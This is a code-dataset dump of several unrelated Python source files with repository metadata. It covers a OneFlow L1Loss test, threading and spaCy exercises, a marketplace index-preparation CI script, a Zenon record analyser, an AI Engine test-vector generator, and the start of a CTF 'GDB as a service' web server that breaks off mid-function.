distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import numpy as np
import oneflow.typing as tp
from test_util import GenArgList
import unittest
from collections import OrderedDict
from typing import Dict
import os
def _compare_l1loss_with_np(
input_shape, target_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
func_config = flow.FunctionConfig()
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
func_config.default_logical_view(flow.scope.consistent_view())
def np_l1loss(np_input, np_target):
np_l1 = np.abs(np_target - np_input)
np_l1_mean = np.mean(np_l1)
np_l1_sum = np.sum(np_l1)
np_l1_dict = {
"np_l1_loss": np_l1,
"np_l1_loss_mean": np_l1_mean,
"np_l1_loss_sum": np_l1_sum,
}
return np_l1_dict
def np_l1_loss_diff(np_input, np_target):
# Use numpy to compute diff
original_shape = np_target.shape
elemcnt = np_target.size
prediction = np_input.reshape(-1)
label = np_target.reshape(-1)
prediction_grad = np.zeros((elemcnt)).astype(prediction.dtype)
for i in np.arange(elemcnt):
diff = prediction[i] - label[i]
prediction_grad[i] = np.sign(diff)
grad_mean = prediction_grad.reshape(original_shape) / elemcnt
# TODO: if you want to get the grad when the reduction = "sum", you can use the follow code
# grad_sum = prediction_grad.reshape(original_shape)
grad_dict = {
"np_grad_mean": grad_mean,
}
return grad_dict
# Use Numpy to compute l1 loss
np_out_l1loss_dict = np_l1loss(input, target)
# Use Numpy to compute l1 grad
np_grad_dict = np_l1_loss_diff(input, target)
def assert_prediction_grad(blob: tp.Numpy):
# Evaluate the gradient. Here we only test the reduction type == "mean"
assert np.allclose(blob, np_grad_dict["np_grad_mean"])
@flow.global_function(type="train", function_config=func_config)
def oneflow_l1loss(
of_input: tp.Numpy.Placeholder(shape=input.shape),
of_target: tp.Numpy.Placeholder(shape=target.shape),
) -> Dict[str, tp.Numpy]:
with flow.scope.placement(device_type, "0:0"):
v = flow.get_variable(
shape=target.shape,
dtype=flow.float32,
initializer=flow.constant_initializer(0),
name="v",
)
x_var = of_input + v
# watch the diff
flow.watch_diff(x_var, assert_prediction_grad)
l1loss = flow.nn.L1Loss(x_var, of_target, reduction="none", name="of_l1loss")
l1loss_mean = flow.nn.L1Loss(
x_var, of_target, reduction="mean", name="of_l1loss_mean"
)
l1loss_sum = flow.nn.L1Loss(
x_var, of_target, reduction="sum", name="of_l1loss_sum"
)
with flow.scope.placement(device_type, "0:0"):
# We only test reduction="mean" diff
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-3]), momentum=0
).minimize(l1loss_mean)
return {
"of_l1_loss": l1loss,
"of_l1_loss_mean": l1loss_mean,
"of_l1_loss_sum": l1loss_sum,
}
of_out_l1loss_dict = oneflow_l1loss(input, target)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss"], np_out_l1loss_dict["np_l1_loss"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_mean"][0], np_out_l1loss_dict["np_l1_loss_mean"]
)
assert np.allclose(
of_out_l1loss_dict["of_l1_loss_sum"][0], np_out_l1loss_dict["np_l1_loss_sum"]
)
def _gen_arg_dict(shape, device_type, machine_ids, device_counts):
# Generate a dict to pass parameter to test case
arg_dict = OrderedDict()
arg_dict["input_shape"] = [shape]
arg_dict["target_shape"] = [shape]
arg_dict["device_type"] = [device_type]
arg_dict["machine_ids"] = [machine_ids]
arg_dict["device_counts"] = [device_counts]
return arg_dict
@flow.unittest.skip_unless_1n1d()
class Testl1loss1n1d(flow.unittest.TestCase):
def test_l1loss_cpu(test_case):
arg_dict = _gen_arg_dict(
shape=(16, 3), device_type="cpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 16, 32), device_type="gpu", machine_ids="0:0", device_counts=1
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
@flow.unittest.skip_unless_1n2d()
class Testl1loss1n2d(flow.unittest.TestCase):
@unittest.skipIf(os.getenv("ONEFLOW_TEST_CPU_ONLY"), "only test cpu cases")
def test_l1loss_gpu_1n2d(test_case):
arg_dict = _gen_arg_dict(
shape=(3, 32, 16), device_type="gpu", machine_ids="0:0-1", device_counts=2
)
for arg in GenArgList(arg_dict):
_compare_l1loss_with_np(*arg)
if __name__ == "__main__":
unittest.main()
| 33.540984 | 99 | 0.665689 |
865144cd196eb39a73555fc643c117d083a615cc
| 744 |
py
|
Python
|
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | null | null | null |
Buta Nicolae/threads.py
|
RazvanBalau/parallel-2020
|
bd9c0dea6cc70e167320f64632d7a235522dfdb3
|
[
"MIT"
] | 23 |
2020-01-15T15:02:39.000Z
|
2020-01-15T17:23:03.000Z
|
import threading
from multiprocessing import Queue
results = []
results2 = []
def take_numbers(q):
print('Enter the numbers:')
for i in range(0,3):
num1 = int(input('Enter first number: '))
num2 = int(input('Enter second number: '))
q.put(num1)
q.put(num2)
def add_num(q):
for i in range(0,3):
num1 = q.get()
num2 = q.get()
results.append(num1+num2)
results2.append(num1-num2)
q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()
for result in results:
print ("adunare =", result)
for result in results2:
print ("scadere =", result)
| 20.666667 | 54 | 0.606183 |
d4c7b73306f8c0594f64a791f8292624d0ac8d82
| 11,237 |
py
|
Python
|
Tests/Marketplace/prepare_public_index_for_private_testing.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Tests/Marketplace/prepare_public_index_for_private_testing.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Tests/Marketplace/prepare_public_index_for_private_testing.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import time
import os
import sys
import shutil
import json
import argparse
from zipfile import ZipFile
from contextlib import contextmanager
from datetime import datetime
from Tests.private_build.upload_packs_private import download_and_extract_index, update_index_with_priced_packs, \
extract_packs_artifacts
from Tests.Marketplace.marketplace_services import init_storage_client
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
MAX_SECONDS_TO_WAIT_FOR_LOCK = 600
LOCK_FILE_PATH = 'lock.txt'
@contextmanager
def lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
try:
acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
yield
except Exception:
logging.exception("Error in dummy index lock context manager.")
finally:
release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path)
def change_pack_price_to_zero(path_to_pack_metadata):
with open(path_to_pack_metadata, 'r') as pack_metadata_file:
pack_metadata = json.load(pack_metadata_file)
pack_metadata['price'] = 0
with open(path_to_pack_metadata, 'w') as pack_metadata_file:
json.dump(pack_metadata, pack_metadata_file, indent=4)
def change_packs_price_to_zero(public_index_folder_path):
paths_to_packs_in_merged_index = [pack_dir.path for pack_dir in os.scandir(public_index_folder_path) if
pack_dir.is_dir()]
for path_to_pack in paths_to_packs_in_merged_index:
path_to_pack_metadata = os.path.join(path_to_pack, 'metadata.json')
change_pack_price_to_zero(path_to_pack_metadata)
def merge_private_index_into_public_index(public_index_folder_path, private_index_folder_path):
packs_in_private_index = [pack_dir.name for pack_dir in os.scandir(private_index_folder_path) if pack_dir.is_dir()]
for pack_name in packs_in_private_index:
path_to_pack_in_private_index = os.path.join(private_index_folder_path, pack_name)
path_to_pack_in_public_index = os.path.join(public_index_folder_path, pack_name)
shutil.copy(path_to_pack_in_private_index, path_to_pack_in_public_index)
def upload_modified_index(public_index_folder_path, extract_destination_path, public_ci_dummy_index_blob, build_number,
private_packs):
"""Upload updated index zip to cloud storage.
Args:
public_index_folder_path (str): public index folder full path.
extract_destination_path (str): extract folder full path.
public_ci_dummy_index_blob (Blob): google cloud storage object that represents the dummy index.zip blob.
build_number (str): circleCI build number, used as an index revision.
private_packs (list): List of private packs and their price.
"""
with open(os.path.join(public_index_folder_path, "index.json"), "w+") as index_file:
for private_pack in private_packs:
private_pack['price'] = 0
index = {
'revision': build_number,
'modified': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'),
'packs': private_packs
}
json.dump(index, index_file, indent=4)
index_zip_name = os.path.basename(public_index_folder_path)
index_zip_path = shutil.make_archive(base_name=public_index_folder_path, format="zip",
root_dir=extract_destination_path, base_dir=index_zip_name)
try:
public_ci_dummy_index_blob.reload()
public_ci_dummy_index_blob.cache_control = "no-cache,max-age=0" # disabling caching for index blob
public_ci_dummy_index_blob.upload_from_filename(index_zip_path)
logging.success("Finished uploading index.zip to storage.")
except Exception:
logging.exception("Failed in uploading index. Mismatch in index file generation.")
sys.exit(1)
finally:
shutil.rmtree(public_index_folder_path)
def option_handler():
"""Validates and parses script arguments.
Returns:
Namespace: Parsed arguments object.
"""
parser = argparse.ArgumentParser(description="Store packs in cloud storage.")
# disable-secrets-detection-start
parser.add_argument('-b', '--public_bucket_name', help="CI public bucket name", required=True)
parser.add_argument('-pb', '--private_bucket_name', help="CI private bucket name", required=True)
parser.add_argument('-s', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
parser.add_argument('-n', '--ci_build_number',
help="CircleCi build number (will be used as hash revision at index file)", required=True)
parser.add_argument('-e', '--extract_public_index_path', help="Full path of folder to extract the public index",
required=True)
parser.add_argument('-sb', '--storage_base_path', help="Storage base path of the directory to upload to.",
required=False)
parser.add_argument('-p', '--pack_name', help="Modified pack to upload to gcs.")
parser.add_argument('-a', '--artifacts_path', help="The full path of packs artifacts", required=True)
parser.add_argument('-ea', '--extract_artifacts_path', help="Full path of folder to extract wanted packs",
required=True)
parser.add_argument('-di', '--dummy_index_dir_path', help="Full path to the dummy index in the private CI bucket",
required=True)
# disable-secrets-detection-end
return parser.parse_args()
def is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
return dummy_index_lock_blob.exists()
def lock_dummy_index(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
with open(LOCK_FILE_PATH, 'w') as lock_file:
lock_file.write('locked')
with open(LOCK_FILE_PATH, 'rb') as lock_file:
dummy_index_lock_blob.upload_from_file(lock_file)
def acquire_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
total_seconds_waited = 0
while is_dummy_index_locked(public_storage_bucket, dummy_index_lock_path):
if total_seconds_waited >= MAX_SECONDS_TO_WAIT_FOR_LOCK:
logging.critical("Error: Failed too long to acquire lock, exceeded max wait time.")
sys.exit(1)
if total_seconds_waited % 60 == 0:
# Printing a message every minute to keep the machine from dying due to no output
logging.info("Waiting to acquire lock.")
total_seconds_waited += 10
time.sleep(10)
lock_dummy_index(public_storage_bucket, dummy_index_lock_path)
def release_dummy_index_lock(public_storage_bucket, dummy_index_lock_path):
dummy_index_lock_blob = public_storage_bucket.blob(dummy_index_lock_path)
dummy_index_lock_blob.delete()
os.remove(LOCK_FILE_PATH)
def add_private_packs_from_dummy_index(private_packs, dummy_index_blob):
downloaded_dummy_index_path = 'current_dummy_index.zip'
extracted_dummy_index_path = 'dummy_index'
dummy_index_json_path = os.path.join(extracted_dummy_index_path, 'index', 'index.json')
dummy_index_blob.download_to_filename(downloaded_dummy_index_path)
os.mkdir(extracted_dummy_index_path)
if os.path.exists(downloaded_dummy_index_path):
with ZipFile(downloaded_dummy_index_path, 'r') as index_zip:
index_zip.extractall(extracted_dummy_index_path)
with open(dummy_index_json_path) as index_file:
index_json = json.load(index_file)
packs_from_dummy_index = index_json.get('packs', [])
for pack in private_packs:
is_pack_in_dummy_index = any(
[pack['id'] == dummy_index_pack['id'] for dummy_index_pack in packs_from_dummy_index])
if not is_pack_in_dummy_index:
packs_from_dummy_index.append(pack)
os.remove(downloaded_dummy_index_path)
shutil.rmtree(extracted_dummy_index_path)
return packs_from_dummy_index
def main():
install_logging('prepare_public_index_for_private_testing.log', logger=logging)
upload_config = option_handler()
service_account = upload_config.service_account
build_number = upload_config.ci_build_number
public_bucket_name = upload_config.public_bucket_name
private_bucket_name = upload_config.private_bucket_name
storage_base_path = upload_config.storage_base_path
extract_public_index_path = upload_config.extract_public_index_path
changed_pack = upload_config.pack_name
extract_destination_path = upload_config.extract_artifacts_path
packs_artifacts_path = upload_config.artifacts_path
dummy_index_dir_path = upload_config.dummy_index_dir_path
dummy_index_path = os.path.join(dummy_index_dir_path, 'index.zip')
dummy_index_lock_path = os.path.join(dummy_index_dir_path, 'lock.txt')
storage_client = init_storage_client(service_account)
public_storage_bucket = storage_client.bucket(public_bucket_name)
private_storage_bucket = storage_client.bucket(private_bucket_name)
dummy_index_blob = public_storage_bucket.blob(dummy_index_path)
with lock_and_unlock_dummy_index(public_storage_bucket, dummy_index_lock_path):
extract_packs_artifacts(packs_artifacts_path, extract_destination_path)
public_index_folder_path, public_index_blob, _ = download_and_extract_index(public_storage_bucket,
extract_public_index_path, storage_base_path)
# In order for the packs to be downloaded successfully, their price has to be 0
change_packs_price_to_zero(public_index_folder_path)
private_packs, private_index_path, private_index_blob = update_index_with_priced_packs(private_storage_bucket,
extract_destination_path,
public_index_folder_path,
changed_pack, True,
storage_base_path)
private_packs = add_private_packs_from_dummy_index(private_packs, dummy_index_blob)
upload_modified_index(public_index_folder_path, extract_public_index_path, dummy_index_blob, build_number,
private_packs)
if __name__ == '__main__':
main()
| 48.021368 | 129 | 0.707128 |
be04c82cd5f62929d01752841a8ec17a1254d468
| 291 |
py
|
Python
|
exercises/pt/exc_01_03_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/exc_01_03_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/exc_01_03_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
# Importar a classe da língua inglesa (English) e criar um objeto nlp
from ____ import ____
nlp = ____
# Processar o texto
doc = ____("I like tree kangaroos and narwhals.")
# Selecionar o primeiro token
first_token = doc[____]
# Imprimir o texto do primeito token
print(first_token.____)
| 22.384615 | 69 | 0.75945 |
0775eae440b3ed8a8de73f26dfbbc57343a6323d
| 6,670 |
py
|
Python
|
text_selection/analyse_zenon_scrape.py
|
dainst/chronoi-corpus-processing
|
7f508a7572e1022c4c88d1477db029e6619a1f0c
|
[
"MIT"
] | null | null | null |
text_selection/analyse_zenon_scrape.py
|
dainst/chronoi-corpus-processing
|
7f508a7572e1022c4c88d1477db029e6619a1f0c
|
[
"MIT"
] | null | null | null |
text_selection/analyse_zenon_scrape.py
|
dainst/chronoi-corpus-processing
|
7f508a7572e1022c4c88d1477db029e6619a1f0c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import csv
import furl
import json
import re
import sys
from collections import defaultdict
def filter_records_without_url(records: []) -> []:
return [r for r in records if any(r.get("urls"))]
def build_furl(url: str) -> furl.furl:
try:
furl_obj = furl.furl(url)
if not furl_obj.host:
furl_obj = furl.furl("http://" + url)
return furl_obj
except ValueError:
return furl.furl("https://invalid-url.xyz")
def determine_host(url: str) -> str:
furl_obj = build_furl(url)
return re.sub(r"^www[0-9]*\.", "", furl_obj.host)
def build_hosts_to_urls(records: []) -> {str: {str}}:
result = defaultdict(set)
for record in records:
for url in record.get("urls"):
host = determine_host(url.get("url"))
result[host].add(url.get("url"))
return result
def print_most_common_url_hosts(hosts_to_urls: {}, n: int):
hosts = [h for h in hosts_to_urls.keys() if len(hosts_to_urls[h]) > n]
hosts = sorted(hosts, key=lambda h: len(hosts_to_urls[h]))
for host in hosts:
print("% 6d\t%s" % (len(hosts_to_urls[host]), host))
def print_urls_for_host(hosts_to_urls: {}, host: str):
urls = hosts_to_urls.get(host, [])
for url in urls:
print(url)
if not any(urls):
print(f"No urls for host: '{host}'", file=sys.stderr)
def print_how_often_url_patterns_cooccur(records: [{}], pattern1: str, pattern2: str):
# It should be ok, to only pattern match the hosts here...
ids1 = {r.get("id") for r in records if record_has_matching_url(r, pattern1)}
ids2 = {r.get("id") for r in records if record_has_matching_url(r, pattern2)}
ids_both = ids1.intersection(ids2)
for host, number in {pattern1: len(ids1), pattern2: len(ids2), "both": len(ids_both)}.items():
print(f"{host}: {number}")
def record_has_matching_url(record: {}, pattern: str) -> bool:
return any(record_get_urls_matching(record, pattern))
def record_get_urls_matching(record: {}, pattern: str) -> [{}]:
result = []
for url in record.get("urls"):
if any(re.findall(pattern, url.get("url"))):
result.append(url)
return result
def record_remove_urls_not_matching(record: {}, pattern: str):
record["urls"] = record_get_urls_matching(record, pattern)
def earliest_year(year_strings: [str]) -> str:
years = []
for year_s in year_strings:
try:
years.append(int(year_s))
except ValueError:
print(f"Not a string that is a year: '{year_s}'", file=sys.stderr)
continue
return str(sorted(years)[0]) if any(years) else ""
def main(args: argparse.Namespace):
with open(args.scrape_file, "r") as file:
records = json.load(file)
records = filter_records_without_url(records)
# filter urls by the user-provided filter list
if args.desc_filters:
with open(args.desc_filters, "r") as file:
filters = file.read().splitlines()
for record in records:
record["urls"] = [url for url in record.get("urls") if url.get("desc") not in filters]
records = filter_records_without_url(records)
# print unique hosts or urls, then exit
if args.print_host_urls or args.print_common_hosts >= 0:
hosts_to_urls = build_hosts_to_urls(records)
if args.print_common_hosts >= 0:
print_most_common_url_hosts(hosts_to_urls, n=args.print_common_hosts)
elif args.print_host_urls:
print_urls_for_host(hosts_to_urls, host=args.print_host_urls)
exit(0)
# check in how many records the two given hosts co-occur, then exit
if args.patterns_cooccur:
host1, host2 = args.patterns_cooccur.split(",")
print_how_often_url_patterns_cooccur(records, host1, host2)
exit(0)
# do some selection based on a url pattern, remove all non-matching urls from the record
if args.select_by_url:
pattern = args.select_by_url
records = [r for r in records if record_has_matching_url(r, pattern)]
for record in records:
record_remove_urls_not_matching(record, pattern)
# sort the records by id, to be extra sure, that we get the same order every time this is called
# print each line as a csv column
records = sorted(records, key=lambda r: r.get("id"))
writer = csv.writer(sys.stdout, delimiter=",", quoting=csv.QUOTE_ALL)
for record in records:
to_print = []
if args.print_id:
to_print.append(record.get("id", ""))
if args.print_url:
to_print.append(record.get("urls")[0].get("url") if any(record.get("urls")) else "")
if args.print_pub_date:
to_print.append(earliest_year(record.get("publicationDates", [])))
if args.print_languages:
to_print.append("|".join(record.get("languages", [])))
writer.writerow(to_print)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Process a file with zenon json records and print some information about them.")
parser.add_argument("scrape_file", type=str, help="The file that contains the zenon dumps as json.")
parser.add_argument("--desc-filters", type=str, help="A file to filter urls by. Excludes urls with 'desc' fields matching a line in the file.")
# these are arguments to print some specific information
parser.add_argument("--print-common-hosts", type=int, default=-1, help="Print hosts that appear more than n times in the records urls, then exit.")
parser.add_argument("--print-host-urls", type=str, help="Print all urls for the host, then exit.")
parser.add_argument("--patterns-cooccur", type=str, help="Format: 'pattern1,pattern2', print how often these occur in single records url fields, then exit.")
# these are meant to work together select by a url pattern then print information about the records
parser.add_argument("--select-by-url", type=str, help="Give a pattern for a url to select records by.")
parser.add_argument("--print-url", action="store_true", help="Print the first of each urls for the selected records. (Ignores other urls present on the records if --select-url is given.)")
parser.add_argument("--print-pub-date", action="store_true", help="Print the earliest publication year for each of the selected records.")
parser.add_argument("--print-id", action="store_true", help="Print the selected records' ids")
parser.add_argument("--print-languages", action="store_true", help="Print the selected records' languages")
main(parser.parse_args())
| 40.670732 | 192 | 0.669715 |
07a919ed87f13258649cbf2c9c6e2971a4de419e
| 5,568 |
py
|
Python
|
AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py
|
jlamperez/Vitis-Tutorials
|
9a5b611caabb5656bbb2879116e032227b164bfd
|
[
"Apache-2.0"
] | 1 |
2022-03-09T06:15:43.000Z
|
2022-03-09T06:15:43.000Z
|
AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py
|
jlamperez/Vitis-Tutorials
|
9a5b611caabb5656bbb2879116e032227b164bfd
|
[
"Apache-2.0"
] | null | null | null |
AI_Engine_Development/Feature_Tutorials/07-AI-Engine-Floating-Point/Utils/GenerationLib.py
|
jlamperez/Vitis-Tutorials
|
9a5b611caabb5656bbb2879116e032227b164bfd
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2020–2021 Xilinx, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from math import *
import random
def GenerateTestVector(dtval,pliow,NPhases_s,NStreams_s,NSamples_s,NFrames_s,SeqType_s,Basename_s):
print('DtVal : ',dtval.get())
print('PLIO width : ',pliow.get())
print('NPhases : ',NPhases_s.get())
print('NStreams : ',NStreams_s.get())
print('NSamples : ',NSamples_s.get())
print('NFrames : ',NFrames_s.get())
print('Type of Sequence : ',SeqType_s.get())
print('Base filename : ',Basename_s.get())
NPhases = int(NPhases_s.get())
NStreams = int(NStreams_s.get())
LFrame = int(NSamples_s.get())
NFrames = int(NFrames_s.get())
SequenceType = SeqType_s.get()
Basename = Basename_s.get()
#parameters that should be in the GUI
# SequenceType ='Linear' # 'SinCos' 'Linear' 'Random' 'Dirac'
# Basename = 'PhaseIn'
NSamples = NPhases*NStreams*LFrame*NFrames;
NSamples1 = NPhases*NStreams*LFrame*(NFrames+1); # A little longer to allow for delay in streams
NBitsData = 32;
if( dtval.get() == 'int16'):
NBitsData = 16
HasImag = 0
if (dtval.get() == 'cint16'):
HasImag = 1
if(SequenceType != 'SinCos' and SequenceType != 'Linear' and SequenceType != 'Random' and SequenceType != 'Dirac'):
print ('Unknown Sequence Type')
return
# Create the overall signal that will be distributed over all streams
# it is already separated in phases
S = np.zeros((NPhases,int(NSamples1/NPhases),1+HasImag))
for i in range(int(NSamples1/NPhases)):
for p in range (NPhases):
k = i*NPhases+p
if (SequenceType == 'SinCos'):
vr = int(5000*cos(6.28*5/(NPhases*NStreams*LFrame)*k))
vi = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
elif (SequenceType == 'Linear'):
vr = k
vi = -k
elif (SequenceType == 'Random'):
vr = random.randint(-5000,5000)
vi = random.randint(-5000,5000)
elif (SequenceType == 'Dirac'):
vr = 0
vi = 0
if(k%151 == 1):
vr = 1
elif(k%151 == 40):
vi = 1
elif(k%151 == 81):
vr = 2
elif(k%151 == 115):
vi = -2
# if(k%311 == 50):
# vr = 1
# S[p,i,0] =
# if(HasImag==1):
# S[p,i,1] = int(5000*sin(6.28*5/(NPhases*NStreams*LFrame)*k))
S[p,i,0] = vr
if (HasImag == 1 ):
S[p,i,1] = vi
PLIOwidth = int(pliow.get())
NSamplesPerLine = int(PLIOwidth/NBitsData) # Data are read in blocks of 128 bits (4 data in cint16)
# Create an Input test Vector in TestInputS.txt
FileNames = [];
# Easiest case: 1 stream per AI Engine
if (NStreams == 1):
#Creates list of filenames
for Phi in range(NPhases):
FileNames.append(Basename+'_'+str(Phi)+'.txt')
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
fd = fds[p]
for s in range(int(NSamples1/NPhases/NSamplesPerLine)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,index,0]))+' ')
if(HasImag):
fd.write(str(int(S[p,index,1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
if (NStreams == 2):
#Creates list of filenames
for Phi in range(NPhases):
for Stream in range(NStreams):
FileNames.append('PhaseIn_'+str(Phi)+'_'+str(Stream)+'.txt')
# Hash table to associate data to streams
NSamplesIn128bits = int(128/NBitsData )
H = np.zeros((int(NSamples1/NPhases/2),2))
H = H.astype('int32')
index = np.zeros(2)
index = index.astype('int32')
for s in range(int(NSamples1/NPhases)):
k = int(s/NSamplesIn128bits) # Block order
i = k%2 # Which streams
H[index[i],i] = s
index[i] = index[i]+1
#Open all files
fds = [open(path, 'w') for path in FileNames]
#Fill all files with the right data
for p in range(NPhases):
for stream in range(2):
fd = fds[2*p+stream]
for s in range(int(NSamples1/NPhases/NSamplesPerLine/NStreams)):
for d in range(NSamplesPerLine):
index = s*NSamplesPerLine + d
fd.write(str(int(S[p,H[index,stream],0]))+' ')
if(HasImag):
fd.write(str(int(S[p,H[index,stream],1]))+' ')
fd.write('\n')
for fd in fds:
fd.close()
| 33.341317 | 119 | 0.541667 |
9c5ca9cec48517b47b0e018883a0875e922d1924
| 4,921 |
py
|
Python
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 2,757 |
2018-04-28T21:41:36.000Z
|
2022-03-29T06:33:36.000Z
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 20 |
2019-07-23T15:29:32.000Z
|
2022-01-21T12:53:04.000Z
|
2018/finals/pwn-gdb-as-a-service/web_challenge/challenge/gaas.py
|
iicarus-bit/google-ctf
|
4eb8742bca58ff071ff8f6814d41d9ec7eb1db4b
|
[
"Apache-2.0"
] | 449 |
2018-05-09T05:54:05.000Z
|
2022-03-30T14:54:18.000Z
|
#!/usr/bin/env python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aiohttp import web
import capstone
import functools
from gdbproc import GDBProcess
import socketio
import asyncio
import codecs
import os
enable_logging = False
premium = 'PREMIUM' in os.environ
if premium:
access_key = os.getenv('PREMIUM_KEY')
runnable = ['/home/user/printwebflag']
else:
access_key = os.getenv('TRIAL_KEY')
runnable = ['/bin/sleep', '20']
MAX_INSN_LEN = 15
capstone_md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
sio = socketio.AsyncServer()
app = web.Application()
sio.attach(app)
with open('index.html') as f:
index_html = f.read()
async def index(request):
if not 'key' in request.cookies:
return web.Response(status=401, text='permission denied (missing key)', content_type='text/html')
if request.cookies['key'] != access_key:
return web.Response(status=401, text='permission denied (invalid key)', content_type='text/html')
return web.Response(text=index_html, content_type='text/html')
app.add_routes([web.get('/', index),
web.get('/{name}', index)])
gdb_sessions = {}
stop_queue_readers = {}
async def on_shutdown(app):
await asyncio.gather(delete_gdb_process(sid) for sid in gdb_sessions.keys())
app.on_shutdown.append(on_shutdown)
def log(msg):
if enable_logging:
print('[*] {}'.format(msg))
@sio.on('connect')
def connect(sid, environ):
log('connected {}'.format(sid))
if not 'key={}'.format(access_key) in environ['HTTP_COOKIE']:
log('access_key not found {}'.format(environ['HTTP_COOKIE']))
return False
@sio.on('disconnect')
async def disconnect(sid):
log('disconnected {}'.format(sid))
await delete_gdb_process(sid)
async def stop_queue_reader(sid, queue):
while True:
pkt = await queue.get()
await update_all(sid)
async def create_gdb_process(sid):
stop_queue = asyncio.Queue()
gdb_sessions[sid] = await GDBProcess.create(runnable, stop_queue, env={'KEY': access_key}, log_fn=log)
loop = asyncio.get_event_loop()
stop_queue_readers[sid] = loop.create_task(stop_queue_reader(sid, stop_queue))
async def delete_gdb_process(sid):
if sid in gdb_sessions:
stop_queue_readers[sid].cancel()
del stop_queue_readers[sid]
await gdb_sessions[sid].release()
del gdb_sessions[sid]
@sio.on('start')
async def start(sid):
